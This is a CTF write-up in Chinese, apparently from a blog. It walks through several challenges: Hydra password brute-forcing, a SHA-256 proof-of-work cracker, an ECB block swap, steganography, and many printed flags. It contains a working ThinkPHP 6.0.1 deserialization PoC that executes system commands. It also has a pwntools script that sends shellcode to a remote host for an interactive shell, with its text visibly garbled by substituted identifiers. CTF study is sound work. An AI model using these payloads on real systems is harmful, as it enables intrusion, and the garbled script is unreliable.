赞
踩
这两个应该是属于非预期,查找文件内容,两个flag都出了:
find / |xargs grep -ri flag{ 2>/dev/null
flag{34f5fdaf-c373-47fd-afab-01ed2914c11a}
解题步骤同上
使用hydra爆破获得root密码toor。
登陆查找(find / |xargs grep -ri flag{ 2>/dev/null)获得flag
flag{7b352ef0-1bb1-41af-a7d7-b74f62ff23f0}
import hashlib
dic = '0123456789abcdefghijklmnopqrstuvwxyzQAZWSXEDCRFVTGBYHNUJMIKOPL'
for a in dic:
for b in dic:
for c in dic:
for d in dic:
t = str(a)+str(b)+str(c)+str(d)+'EvLOXDipk6pWH7ci'
#print(t)
sha256=hashlib.sha256(t.encode("utf8")).hexdigest()
#print(sha256)
if sha256 == 'ca0dddf277edecadf0de6f6c6c99ee2664a736ad847f8a345970a6f233eb6910':
print(t)
break
结合后面的题这个值就传0,使其rb为0
然后他给的是rA||rB||B加密的结果,要我们给rB||rA.,猜测是ECB模式加密。,所以直接将第一块和第二块换一下位置即可
最终得到flag,
flag{0fc5a96c-16e5-497e-955a-3e7356bd549c}
利用ThinKPHP6.0.1的反序列化漏洞利用链构造后成功在根目录下获取flag,POC如下
<?php namespace think{ abstract class Model{ private $lazySave = false; private $data = []; private $exists = false; protected $table; private $withAttr = []; protected $json = []; protected $jsonAssoc = false; function __construct($obj = ''){ $this->lazySave = True; $this->data = ['whoami' => ['cat /flag.txt']]; $this->exists = True; $this->table = $obj; $this->withAttr = ['whoami' => ['system']]; $this->json = ['whoami',['whoami']]; $this->jsonAssoc = True; } } } namespace think\model{ use think\Model; class Pivot extends Model{ } } namespace{ echo(urlencode(serialize(new think\model\Pivot(new think\model\Pivot())))); }
flag{8c3f66f3-f3ca-4b6e-be63-9230376498fc}
from RemoteServerwn imRemoteServerort * ShellCode = "Rh0666TY1131Xh333311k13XjiV11Hc1ZXYf1TqIHf9kDqW02DqX0D1Hu3M2G0Z2o4H0u0RemoteServer160Z0g7O0Z0C100y5O3G020B2n060N4q0n2t0B0001010H3S2y0Y0O0n0z01340d2F4y8RemoteServer115l1n0J0h0a071N00" def main(): context(log_level='debug', arch='amd64', os='linux') #RemoteServer = RemoteServerrocess("./login") RemoteServer = remote("101.201.144.230", 24613) libc = ELF('./libc-2.33.so') RemoteServerayload1 = 'ORemoteServerT:1\nMSG:ro0ta\n' RemoteServerayload2 = 'ORemoteServerT:2\nMSG:'+ShellCode+"\n" RemoteServer.recvuntil(">>> ") RemoteServer.sendline(RemoteServerayload1) RemoteServer.recvuntil(">>> ") RemoteServer.sendline(RemoteServerayload2) RemoteServer.interactive() if __name__ == "__main__": main()
flag{7d4521c1-4789-4365-8475-86cb048eeaf1}
flag{20de17cc-d2c1-4b61-bebd-41159ed7172d}
打开链接根据摩斯密码表点击三次按钮输入s启动,根据公众号的提示和密码本进行模十算法,如图
根据提示将得出的数据发包即可得到flag
flag{59727c32-14c9-4bf1-9c65-cbeae9d8a247}
填写问卷即可得到flag。
flag{Thanksforplayingourgames
根据提示,用stegsolve进行分析,挨个查看,得到一串字符串
对其进行尝试lsb隐写解密,
查看文件内容,可以知道是加密的zip文件
在图片最后多余处,得到一串md5,MD5破解得到压缩包密码
解压得到flag的图片,用GIMP打开看到flag,但是不方便读,PS修改一下,得到flag
flag{607f41da-e849-4c0b-8867-1b3c74536cc4}
Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。